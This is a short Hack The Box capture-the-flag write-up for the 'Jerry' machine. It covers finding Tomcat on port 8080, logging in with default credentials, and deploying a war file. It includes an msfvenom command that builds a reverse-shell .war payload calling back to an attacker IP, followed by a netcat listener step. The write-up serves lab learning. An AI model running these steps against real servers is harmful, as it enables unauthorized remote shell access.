Hack The Box Jerry Write-Up

Akash c
Nov 19, 2018

Enumeration

Nmap

Nmap reveals that port 8080 is open. Let’s visit port 8080 in a web browser.

Apache Tomcat/7.0.88
Basic access authentication

To access the Tomcat manager we need a valid username and password. When we enter an invalid username and password, we get a 403 Access Denied message.

403 Access Denied

Let’s try the username: tomcat and password: s3cret

Once we successfully authenticate, we’re brought to the Tomcat Web Application Manager. The Tomcat manager has an option to upload .war files to the server.

Tomcat Web Application Manager

Exploitation

We can use msfvenom to generate a Java reverse-shell payload with a .war extension:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f war > cmd.war

Upload and deploy the reverse shell, then visit http://10.10.10.95:8080/cmd/

Let’s open a netcat listener to catch the shell that is spawned when our cmd.war file is executed.

The flag is located in

C:\Users\Administrator\Desktop\flags

The user and root flags are both written in the file "2 for the price of 1.txt", which can be read using the type command.

type "2 for the price of 1.txt"
